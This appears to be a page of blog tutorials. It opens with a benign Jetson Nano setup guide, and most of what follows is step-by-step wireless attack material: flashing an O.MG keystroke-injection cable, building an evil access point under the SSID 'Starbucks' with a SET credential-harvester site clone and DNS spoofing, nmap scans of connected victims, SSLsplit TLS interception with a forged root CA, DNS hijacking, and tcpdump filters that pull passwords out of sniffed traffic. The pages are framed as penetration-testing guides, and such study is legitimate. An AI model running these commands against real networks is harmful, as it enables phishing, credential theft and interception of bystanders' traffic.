Wifi

First steps with Jetson Nano 2GB Developer Kit (Part 1)

The Jetson Nano Developer Kits are awesome to start with artificial intelligence and machine learning. To make your learning more successful, I will use this tutorial to explain some first important steps before you start.

Requirements

The values ​​in brackets are intended to indicate the hardware I am using. However, you can use other compatible hardware. Before you buy, see the documentation provided by Nvidia. Here you will find also a page with many good information collected.

  • Jetson Nano Developer Kit (2GB with WiFi)
  • 5V Fan (NF-A4x20 5V PWM)
  • USB or CSI camera (Raspberry Pi Camera Module V2)
  • Power Supply (Raspberry Pi 15W USB-C Power Supply)
  • Micro SD Card (SanDisk microSDXC-Karte Ultra UHS-I A1 64 GB)

additional Hardware:

  • Monitor & HDMI cable
  • Mouse & Keyboard
  • USB cable (Delock USB 2.0-Kabel USB C – Micro-USB B 1 m)

Objective

The first part should provide information about needed parts to buy and describes the necessary installation (headless).

Installation

After downloading the SD card image (Linux4Tegra, based on Ubuntu 18.04), you can write it to the SD card immediately. Make sure to use the correct image in each case! Here a short overview about commands if you use a macOS.

# list all attached disk devices
$ diskutil list external | fgrep '/dev/disk'

# partitioning a disk device (incl. delete)
$ sudo diskutil partitionDisk /dev/disk<n> 1 GPT "Free Space" "%noformat%" 100%

# extract archive and write to disk device
$ /usr/bin/unzip -p ~/Downloads/jetson-nano-2gb-jp46-sd-card-image.zip | sudo /bin/dd of=/dev/rdisk<n> bs=1m

There is no automatic indication of the dd progress but you can press [control] + [t] while dd is running.

The setup and boot of the Jetson Nano could be done in two different ways (with GUI or Headless). In case you choose the headless setup, connect your computer with the Micro-USB port of the Jetson Nano and follow the next instructions.

# list serial devices (optional)
$ ls /dev/cu.usbmodem*

# list serial devices (long listing format)
$ ls -l /dev/cu.usbmodem*
crw-rw-rw-  1 root  wheel   18,  24 Dec  2 07:23 /dev/cu.usbmodem<n>

# connect with terminal emulation
$ sudo screen /dev/cu.usbmodem<n> 115200

Now you simply follow the initial setup steps and reboot the device after your finish.

Connect to WiFi

If you have not setup the WiFi on initial setup, you can connect again via serial interface and follow the next steps.

# connect with terminal emulation
$ sudo screen /dev/cu.usbmodem<n> 115200

# enable (if WiFi is disabled)
$ nmcli r wifi on

# list available WiFi's
$ nmcli d wifi list

# connect to WiFi
$ nmcli d wifi connect <SSID> password <password>

# show status (optional)
$ nmcli dev status

# show connections (optional)
$ nmcli connection show

Finally you can run the update and installation of needed additional packages.

# update packages
$ sudo apt update -y && sudo apt upgrade -y

# install packages (optional)
$ sudo apt install -y vim tree

From this point on, nothing should stand in the way of the SSH connection, provided you are in the same network.

# get IP (on Jetson device)
$ ip -4 a

# connect via SSH (example for local device)
┌──[lupin@HackMac]::[~]
└─ % ssh -C4 <user>@<ip>

In next Part 2 we will add the fan (incl. installation of needed software) and add the camera.

O.MG Cable Setup on (Kali) Linux

MG made something really cool (and dangerous too) to perform keystroke injection attacks (via Rubber Ducky scripts) simply over wireless interface. In this tutorial I want to show you the first important steps before you can start the penetration testing. The cables, programmer and other awesome MG products are available from Hak5.

Important: You should own (or buy) at least one O.MG Cable Programmer, otherwise you will not be able to follow the steps below!

Preparation

First check whether Python 3.7 (or higher) and pyserial (incl. dependencies) is installed. It is already pre-installed in my Kali Linux.

# check python version
$ python3 --version
Python 3.8.6

# check for python package
$ pip3 freeze | grep 'pyserial'
pyserial==3.5b0

If you still need to install the necessary packages.

# install needed python package(s)
$ sudo pip3 install pyserial

Download the latest O.MG Firmware (incl. needed scripts/binaries) now.

# download latest Firmware via CURL
$ curl -L -C - https://github.com/O-MG/O.MG_Cable-Firmware/releases/download/v1.5.3/O.MG_Cable-Firmware-v1.5.3.zip -o ~/Downloads/O.MG_Cable-Firmware-v1.5.3.zip

# unzip archive
$ unzip ~/Downloads/O.MG_Cable-Firmware-v1.5.3.zip -d ~/Downloads/

# list content (optional)
$ ls -la ~/Downloads/O.MG_Cable-Firmware-v1.5.3/

# list physical USB device hierarchy (optional)
$ lsusb

Install Firmware

Now plug the O.MG programmer into your computer and the O.MG cable into the programmer. This can be a bit more difficult at first, so be careful not to destroy everything right away. Even when pulling out – Treat it like a beautiful woman.

Note: If you are running Kali Linux as VM (e.g. VirtualBox), passthrough needed USB devices.

VirtualBox USB passthrough

Change into directory O.MG_Cable-Firmware-v1.5.3 and set the file permissions for file flash.py and start the Firmware configuration and setup.

# list physical USB device hierarchy (optional)
$ lsusb

# run python script
$ sudo python3 ./flash.py

Caution: If you see the following output (or similar) Connecting........_____..... but flashing the firmware ends with an error – means that the programmer was recognized correctly but the cable was not. Remove the cable and plug it in again. In addition, the cable needs a reset after every firmware flash.

If everything works (which is the normal case) you will be asked in which mode (AP or STA) the wifi should work. In my example, I am using for this tutorial the Access Point (AP) mode. So I’ll set the SSID as well as wifi credentials. You can later access with any modern browser via URL http://192.168.4.1. Whether you need AP or STA mode depends on your environment and your attack vector. But try to get to know both as well as their respective advantages and disadvantages.

SELECT WIFI MODE ...: 2
ENTER WIFI SSID ...: OMGtest
ENTER WIFI PASS ...: test12345

Confirm your entries and wait a moment. An overview is displayed (do not forget the password).

Flash Operation Complete!

[ WIFI SETTINGS ]
  WIFI_SSID: OMGtest
  WIFI_PASS: test12345
  WIFI_MODE: 2
  WIFI_TYPE: ACCESS POINT

[ FIRMWARE USED ]
  INIT: firmware/esp_init_data_default_v08.bin
  ELF0: firmware/image.elf-0x00000.bin
  ELF1: firmware/image.elf-0x10000.bin
  PAGE: firmware/page.mpfs

<<< PROCESS FINISHED, REMOVE PROGRAMMER >>>
Press Enter to continue...

That was done super quickly and easily. Now pull the cable out of the programmer and you can start.

Evil access point on macOS

With just a few steps it is possible to convert the MacBook into an evil access point. The device already has everything that is necessary in terms of hardware. For the additionally software only an Internet access is is required.

Note: The installation and configuration of Kali Linux VM (inside VirtualBox) is not part of this tutorial.

Objectives

Turn the macOS into wifi hotspot with fake DNS.

Starting position

Via cable (USB-C to Lightning) my MacBook and my IPhone are connected. On the IPhone the Hotspot (USB tethering) is enabled. The Wifi devices is off. Finally there is a Kali Linux VM and SSH access is configured in it.

Step 1: check current local config

Most of the following commands in the first step are optional, only your own IP is important. But this will give you a better understanding of your system.

# show local ip
$ ifconfig en7
[172.20.10.2]

# show system DNS configuration (optional)
$ scutil --dns | grep nameserver

# show network status (optional)
$ netstat -na | grep "\.53"

My interface is en7 and my local IP is 172.20.10.2. For you this can be different! The IPhone is my nameserver 172.20.10.1 (results of scutil) and no service is listen on port 53 (results of netstat).

Step 2: start Kali Linux and clone website

As already mentioned, we are now using the Kali Linux VM. The only important point for VM configuration is that the interface is mode “Bridged Network“.

# list all vm's
$ VBoxManage list vms

# start headless specific vm
$ VBoxManage startvm --type headless "KaliLinux"

# show running vm's (optional)
$ VBoxManage list runningvms

# get IP of vm
$ VBoxManage guestproperty get "KaliLinux" "/VirtualBox/GuestInfo/Net/0/V4/IP"
[172.20.10.3]

# SSH into VM
$ ssh <user>@172.20.10.3

Inside the Kali Linux we use The Social-Engineer Toolkit (SET) to clone quickly a website.

# start setoolkit
$ sudo setoolkit

# select Social-Engineering Attacks
1) Social-Engineering Attacks
2) Penetration Testing (Fast-Track)
3) Third Party Modules
4) Update the Social-Engineer Toolkit
5) Update SET configuration
6) Help, Credits, and About

set> 1

# select Website Attack Vectors
1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) Wireless Access Point Attack Vector
8) QRCode Generator Attack Vector
9) Powershell Attack Vectors
10) Third Party Modules

set> 2

# select Credential Harvester Attack Method
1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Web Jacking Attack Method
6) Multi-Attack Web Method
7) HTA Attack Method

set:webattack> 3

# select Site Cloner
1) Web Templates
2) Site Cloner
3) Custom Import

set:webattack> 2

After the inputs for IP (IP of VM) and domain (URL to clone) you should use an other tab (CMD + t) on your terminal. You can check the cloning result in your browser.

Step 3: clone, build, and run dnsmasq

Now dnsmasq is needed. You can install via brew or download and compile by your self.

# clone latest git repository
$ git clone git://thekelleys.org.uk/dnsmasq.git

# change into cloned directory
$ cd dnsmasq

# build dnsmasq binary
$ make

# show help for dnsmasq
$ sudo ./src/dnsmasq --help

# run dnsmasq
$ sudo ./src/dnsmasq --no-dhcp-interface= --no-daemon --log-queries --no-hosts --no-resolv --no-poll --server=8.8.8.8 --address="/example.com/172.20.10.3"

Dnsmasq runs without DHCP service, without reading /etc/hosts and /etc/resolv.conf. Google IP is given for upstream DNS server.

Step 4: test your DNS

And again you should use an other tab (CMD + t) on your terminal. Now you can verify the dnsmasq configuration.

# flush local DNS
$ sudo killall -HUP mDNSResponder

# dig on local IP
$ dig @172.20.10.2 +short example.com

# dig on localhost
$ dig @localhost +all example.com

# nslookup on local
$ nslookup login.example.com 172.20.10.2

Step 5: create access point

Set the DNS server for the Wi-Fi service and then start the hotspot.

# set DNS server
$ networksetup -setdnsservers Wi-Fi 172.20.10.2

My favorite SSID: Starbucks

macOS hotspot Starbucks

Now it’s time to wait… In the meantime, you can find out more about your connected STA’s.

# show STA informations (optional)
$ cat /private/var/db/dhcpd_leases

Gather STA informations with Wifi Pineapple

Some STA’s (stations) are connected to your AP (access point) and you need now more informations about them? No Problem! In this tiny tutorial I will show some command line possibilities. Together we will look who is connected, will try to detect the OS (incl. ports and services). Important is that for this examples your need to share internet connect to Wifi Pineapple, otherwise downloads/installations will not work.

Objectives

With different command line technics we actively gather information from connected STA’s.

Step 1: install nmap

As usual, the installation via opkg is very simple. Update list of available packages, search for package, read about dependencies and start the installation.

# update list of available packages
$ opkg update

# search for package
$ opkg list nmap

# get some informations
$ opkg info nmap

# check if dependencies are already installed
$ opkg status libpcap1

# install all needed packages
$ opkg install libpcap1 nmap

# verify installation
$ nmap --help

Step 2: get connected clients via command line

With following nmap commands you could start to detect STA’s, but to be honest this is slow and not really the optimal solution. But I will show them.

# layer 2 discovery (IP range)
$ nmap -PR -sn 172.16.42.1-255

# layer 3 discovery (IP range)
$ nmap -PE -sn 172.16.42.1-255

# layer 4 (udp) discovery (IP range)
$ nmap -PU53 -sn 172.16.42.1-255

# layer 4 (tcp) discovery (IP range)
$ nmap -PA80 -sn 172.16.42.1-255

# find all Netbios servers (on subnet)
$ nmap -sV -v -p 139,445 172.16.42.0/24

If you tried out, you feel already that this cannot the best way. With iw or iwinfo commands we found them much faster. To get fast the IP you could grep inside the file /tmp/dhcp.leases.

# show STA's via iw
$ iw dev wlan0 station dump

# show STA's via iwinfo
$ iwinfo wlan0 assoclist

# get specific IP via dhcp.leases
$ cat /tmp/dhcp.leases | grep -i '70:48:0F:C3:31:7A' | cut -d ' ' -f3

Step 3: run nmap against specific client

Now the nmap scans will be used only for specific STA’s. Here are a few scan command examples.

# classical ping
$ nmap -PE 172.16.42.x

# scanning the entire port range
$ nmap -v -p- 172.16.42.x

# detect services
$ nmap -v -sV 172.16.42.x

# detect OS
$ nmap -v -O 172.16.42.x

# detect services and OS
$ nmap -v -O -sV 172.16.42.x

# aggressive scan (includes -O, -sV, -sC and --traceroute)
$ nmap -v -A 172.16.42.x

You need to find the best parameters for yourself but the output in combinations with tools like searchsploit (GitHub) it can be very powerful.

Wifi Pineapple and SSLsplit

Many people complain about that they are not able to run SSLsplit on Wifi Pineapple. As you may know from my previous Pineapple tutorials, I will try to explain the solution now, without the usage of any additional module. All needed steps for installation, configuration and execution need the enabled internet sharing!

Objectives

In this example you will learn how to setup and run SSLsplit on Wifi Pineapple.

Step 1: install needed packages

SSH into Wifi Pineapple device and install all needed software with Opkg Package Manager.

# update list of available packages
$ opkg update

# install needed packages
$ opkg install sslsplit
$ opkg install openssl-util
$ opkg install libevent2
$ opkg install libevent2-core
$ opkg install libevent2-extra
$ opkg install libevent2-openssl
$ opkg install libevent2-pthreads

Step 2: create directories and configurations

Like the module would create directories and configuration files, we do exactly the same. So we could install the module later, too.

# create need folders
$ mkdir -p /pineapple/modules/SSLsplit/cert
$ mkdir -p /pineapple/modules/SSLsplit/rules
$ mkdir -p /pineapple/modules/SSLsplit/log

# create iptables and openssl.cnf files
$ vi /pineapple/modules/SSLsplit/rules/iptables
$ vi /pineapple/modules/SSLsplit/cert/openssl.cnf

# create sslsplit configuration
$ touch /etc/config/sslsplit

# add content
$ echo "config sslsplit 'module'" > /etc/config/sslsplit

# check if ip4 forward is enabled
$ cat /proc/sys/net/ipv4/ip_forward

# enable ip4 forward (if not enabled)
$ echo '1' > /proc/sys/net/ipv4/ip_forward

# show help (optional)
$ sslsplit -h

The content of iptables

##################################################################
# Certain packets are redirected to the local port 8080 and 8443 #
##################################################################

## Plain text HTTP traffic (80) is redirected to port 8080
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080

## WhatsApp (5222) is redirected to port 8080
iptables -t nat -A PREROUTING -p tcp --dport 5222 -j REDIRECT --to-ports 8080

## SSL-based HTTPS traffic (443) is redirected to port 8443
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT --to-ports 8443

## IMAP over SSL (993), SMTP over SSL (465 and 587) is redirected to port 8443
iptables -t nat -A PREROUTING -p tcp --dport 587 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 465 -j REDIRECT --to-ports 8443
iptables -t nat -A PREROUTING -p tcp --dport 993 -j REDIRECT --to-ports 8443

The content of openssl.cnf

#
# OpenSSL configuration file.
#

dir						= .

[ req ]
distinguished_name = reqdn

[ reqdn ]

[ v3_ca ]
basicConstraints        = CA:TRUE
subjectKeyIdentifier    = hash
authorityKeyIdentifier  = keyid:always,issuer:always

Step 3: generate needed certificates

# generate an RSA private key
$ openssl genrsa -out /pineapple/modules/SSLsplit/cert/certificate.key 1024

# generat PKCS#10 certificate
$ openssl req -new -nodes -x509 -sha1 -out /pineapple/modules/SSLsplit/cert/certificate.crt -key /pineapple/modules/SSLsplit/cert/certificate.key -config /pineapple/modules/SSLsplit/cert/openssl.cnf -extensions v3_ca -subj '/O=SSLsplit Root CA/CN=SSLsplit Root CA/' -set_serial 0 -days 3650

# verify files generated (optional)
$ ls -la /pineapple/modules/SSLsplit/cert/

Step 4: finalize installation and configuration

These steps are optional but are recommended.

# set UCI values
$ uci set sslsplit.module.installed=1

# write UCI changes
$ uci commit sslsplit.module.installed

# show UCI configuration (optional)
$ uci show sslsplit

# reboot wifi pineapple device
$ reboot

Step 5: set iptables

The following content describes how you need to configure the iptables before you start SSLsplit.

# save current iptables rules
$ iptables-save > /pineapple/modules/SSLsplit/rules/saved

# clean iptables
$ iptables -X
$ iptables -F
$ iptables -t nat -F
$ iptables -P INPUT ACCEPT
$ iptables -P FORWARD ACCEPT
$ iptables -P OUTPUT ACCEPT

# add rules
$ sh /pineapple/modules/SSLsplit/rules/iptables

$ iptables -t nat -A POSTROUTING -j MASQUERADE

Step 6: run SSLsplit

# execute sslsplit
$ sslsplit -D -l /pineapple/modules/SSLsplit/connections.log -L /pineapple/modules/SSLsplit/log/output.log -k /pineapple/modules/SSLsplit/cert/certificate.key -c /pineapple/modules/SSLsplit/cert/certificate.crt ssl 0.0.0.0 8443 tcp 0.0.0.0 8080

# tail log files (optional)
$ tail -f /pineapple/modules/SSLsplit/connections.log /pineapple/modules/SSLsplit/log/output.log

Step 7: restore iptables

After you’r done, the following content show how to restore the iptables.

# clean iptables
$ iptables -F
$ iptables -X
$ iptables -t nat -F
$ iptables -t nat -X
$ iptables -t mangle -F
$ iptables -t mangle -X
$ iptables -P INPUT ACCEPT
$ iptables -P FORWARD ACCEPT
$ iptables -P OUTPUT ACCEPT

# restore iptables rules
$ iptables-restore < /pineapple/modules/SSLsplit/rules/saved

DNS Hijacking with Wifi Pineapple

If you tried out modules like DNSspoof or DNSMasqSpoof on your Wifi Pineapple and had no success, then this tutorial will help you now. I will try my best to show you here a simple (and working) solution. The way differs to other tutorials on internet but should enable you to progress in your daily hacking work.

Objectives

In this example you will learn the basics about DNS Hijacking on Wifi Pineapple (without any additional modules).

Precondition

The ready configured internet share to Wifi Pineapple like in this tutorial, as well a 2nd device (or Virtual Machine) and a running FakeAP (where we later connect).

Step 1: prepare local PHP file and start PHP build-in server

To keep it simple, create the fake target site (incl. server) on your local device. This saves ressources on Wifi Pineapple device and will help more to understand this hole topic.

# create local project
$ mkdir -p ~/Projects/LandingPage

# change into project directory
$ cd ~/Projects/LandingPage

# create index.php file
$ vi ~/Projects/LandingPage/index.php

# start simple PHP server
$ php -S 0.0.0.0:80 index.php

# verify inside local browser (optional)
$ open http://172.16.42.42/

Content of very simple PHP file

<?php
header('Content-Type: text/html; charset=UTF-8');
echo 'hello spoofed DNS victim';

If you understand how all works, have a look on setoolkit.

Step 2: change hosts file and flush DNS

The DNS redirection (example.com to local running server) on the Wifi Pineapple is very easy. Just connect with SSH, modify the hosts file and flush the DNS cache.

# ssh into Wifi Pineapple
$ ssh -C4 root@172.16.42.1

# edit hosts file
$ vi /etc/hosts

# clear DNS cache
$ killall dnsmasq && /etc/init.d/dnsmasq start

# verify (optional)
$ nslookup example.com

# download website (optional)
$ wget example.com -O /tmp/index.html

# view file content (optional)
$ cat /tmp/index.html

The /etc/hosts file after modify it (2nd line).

127.0.0.1 localhost
172.16.42.42 example.com

::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

However, since there are strong restrictions with this type (for example wildcards are not possible), you should use the DNSMasq configuration “addn-hosts” later. But for now it’s fine.

Step 3: flush DNS and connect to Wifi

Now you can flush the DNS on your device or vm (STA) load the page (example.com). If everything works perfectly you should see now the following content in your browser.

Fake response:

Content for spoofed DNS

Real response:

Response for not spoofed DNS

Wifi Pineapple, tcpdump and Wireshark

Your Wifi Pineapple is up and running and some connected clients produce a lot of network traffic. What also means half of your MITM work is already done. 😉 Without any additional module you can already analys this traffic with tcpdump, which is installed by default. In combination with Wireshark (SSH Remote Capture) you can reach awesome goals.

Objectives

In this tutorial I will explain how easy you can obtain important network information via your MITM attack with tcpdump and/or Wireshark.

Step 1: some preparation first

Start the Wifi Pineapple, enable Internet sharing and verify your configurations. Without internet sharing your wifi clients don’t produce valuable traffic! In previous tutorials about Wifi Pineapple I wrote down two options how you can share internet on macOS (here and here you will find them).

Step 2: add an station (STA) to access point (AP)

For next step it’s needed to understand your network interfaces. On all Pineapple devices (Nano/Tetra) you have 2 WLAN interfaces -> wlan0 and wlan1 (inclusiv some other eq eth). Of course tcpdump would analyze the traffic for all interfaces but to be more precise and correct you should sniff packets on specific interface. So depended how an AP is created (open or FakeAP) and an STA is connected you need to decide on which interface you will work (wlan0 or wlan1mon).

For this example I will not create a fake AP (wlan1mon), I simply use the Open SSID (under menu item Networking). The SSID of my choise is Starbucks.

Open SSID configuration on Wifi Pineapple

As a STA I choose my own iPad (172.16.42.187).

iPad client on WiFi Pineapple

As I am mostly trust nothing, I can verify simply (ifconfig on Wifi Pineapple).

# get interface status (optional)
$ ssh -C4 root@172.16.42.1 "ifconfig"
wlan0     Link encap:Ethernet  HWaddr 00:13:37:A7:A3:3D  
          inet6 addr: fe80::213:37ff:fea7:a33d/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:334 errors:0 dropped:0 overruns:0 frame:0
          TX packets:479 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:36864 (36.0 KiB)  TX bytes:58796 (57.4 KiB)

wlan1     Link encap:Ethernet  HWaddr 00:13:37:A7:A3:3E  
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

Step 3: analys traffic with tcpdump

Our tcpdump examples will be executed directly on the Pineapple device, therefore please SSH into it.

# ssh into Pineapple
$ ssh -C4 root@172.16.42.1

The following tcpdump examples will help you to understand the basics. In case you need a deeper explanation about the commands use this free online service.

# show DNS traffic
$ tcpdump -i wlan0 -nn -l udp port 53

# show HTTP User Agent and Hosts
$ tcpdump -i wlan0 -nn -l -A -s1500 | egrep -i 'User-Agent:|Host:'

# show HTTP requests and Hosts
$ tcpdump -i wlan0 -nn -l -s 0 -v | egrep -i "POST /|GET /|Host:"

# show e-mail recipients
$ tcpdump -i wlan0 -nn -l port 25 | egrep -i 'MAIL FROM\|RCPT TO'

# show FTP data
$ tcpdump -i wlan0 -nn -v port ftp or ftp-data

# show all passwords different protocols
$ tcpdump -i wlan0 port http or port ftp or port smtp or port imap or port pop3 or port telnet -l -A | egrep -i -B5 'pass=|pwd=|log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

Step 4: analys traffic with Wireshark

As disk space and hardware resources are not that high on Pineapple devices, why not use local Wireshark and analyze the traffic via remote?

In case you don’t have Wireshark already installed, now it will be the best time for it. Otherwise you can’t follow now this last part now.

To start tcpdump and Wireshark only a single one-liner is needed. Note: The Wireshark path I use in the example, is only for macOS!

# start tcpdump via SSH and Wireshark remote capture
$ ssh root@172.16.42.1 'tcpdump -i wlan0 -s0 -nn -w - not port 22' | /Applications/Wireshark.app/Contents/MacOS/Wireshark -k -i -

Here now some examples for Wireshark display filters.

Wireshark display filter for DNS

DNS queries and specific IP (STA)

(dns.flags.response == 0) && (ip.src == 172.16.42.187)

DNS responses and specific IP (STA)

(dns.flags.response == 1) && (ip.src == 172.16.42.187)

All HTTP requests

http.request

All HTTP responces and HTTP status code 200

(http.response) && (http.response.code == 200)

As you can see now, for such network analytics no additional Wifi Pineapple modules are required. What does not mean that I don’t like them.

Share internet from macOS to Wifi Pineapple (Part 2)

Some weeks ago I wrote the first part about Internet Sharing. There we changed the network configuration on the Wifi Pineapple itself. This time we tweak the network configuration (NAT subnet configurations) so that we can use internet sharing on macOS inside “172.16.42.x” network.

Objectives

Configure Internet Sharing without changing the default settings on Wifi Pineapple (but change defaults on macOS).

Step 1: Prepare for next steps

If you have “Internet Sharing” enabled, now you must switch it off!

Turn on the Wifi Pineapple device and connect via USB (A plug for NANO, ETH plug for TETRA) to your Mac. If everything works fine, following commands should run successful.

# ping device (optional)
$ ping -c 1 172.16.42.1

# show wifi pineapple network settings (optional)
$ ssh root@172.16.42.1 -C 'uci show network'

# start browser session (optional)
$ open http://172.16.42.1:1471

Step 2: Configure default subnet

The property list (com.apple.nat.plist) is like a contract between the “Sharing preferences pane” and “InternetSharing”. One important property to set there is “SharingNetworkNumberStart” (all other properties, which follow in this tutorial, are optional). This property controls the behavior of InternetSharing when it configures IP addresses for the local interfaces. I choose value 172.16.42.10.

# read the property list (optional)
$ defaults read /Library/Preferences/SystemConfiguration/com.apple.nat.plist

# create backup of the property list file (optional)
$ sudo cp /Library/Preferences/SystemConfiguration/com.apple.nat.plist /Library/Preferences/SystemConfiguration/com.apple.nat.plist.bak

# add start IP
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberStart 172.16.42.10

# add end IP (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkNumberEnd 172.16.42.100

# add network mask (optional)
$ sudo defaults write /Library/Preferences/SystemConfiguration/com.apple.nat NAT -dict-add SharingNetworkMask 255.255.255.0

Step 3: Network configuration

We will deal with 2 interfaces locally (enX and bridge100). Now we configure the “enX” IP first. We do this simply via “Network preferences”. Depending to your Wifi Pineapple device you should see following services:

  • NANO: AX88x72A
  • TETRA: USB 10/100 LAN

Select the service and configure like in picture.

macOS - Wifi Pineapple IP configuration

Now change the network service order.

macOS - Wifi Pineapple network service order

After saving, we quickly check everything.

# check interface (in my case it's en5)
$ ifconfig en5                
...
inet 172.16.42.10 netmask 0xffffff00 broadcast 172.16.42.255

# ping from wifi pineapple (should not work yet)
$ ssh root@172.16.42.1 -C 'ping -c 1 google.com'
...
ping: sendto: Network unreachable

# check for interface (should not exist)
$ ifconfig bridge100
...
ifconfig: interface bridge100 does not exist

Step 4: Start Internet Sharing

Inside “System Preferences”, click “Sharing”, then select “Internet Sharing”. Configure as in picture.

macOS - Wifi Pineapple internet share

Step 5: Set bridge100 interface IP

Back to the terminal, here the interface “bridge100” should be visible now. This interface we assign the IP 172.16.42.42.

# show interface information (optional)
$ ifconfig bridge100

# add IP to bridge100 interface
$ sudo ifconfig bridge100 172.16.42.42 netmask 255.255.255.0 up

That’s it already! Via “Bulletins” you can verify.

Wifi Pineapple Dashboard

BTW … Take a look at the following local files, with and without Internet sharing!

# read config file for DHCP
$ defaults read /etc/bootpd.plist

# read internet share config (optional)
$ defaults read /System/Library/LaunchDaemons/com.apple.NetworkSharing.plist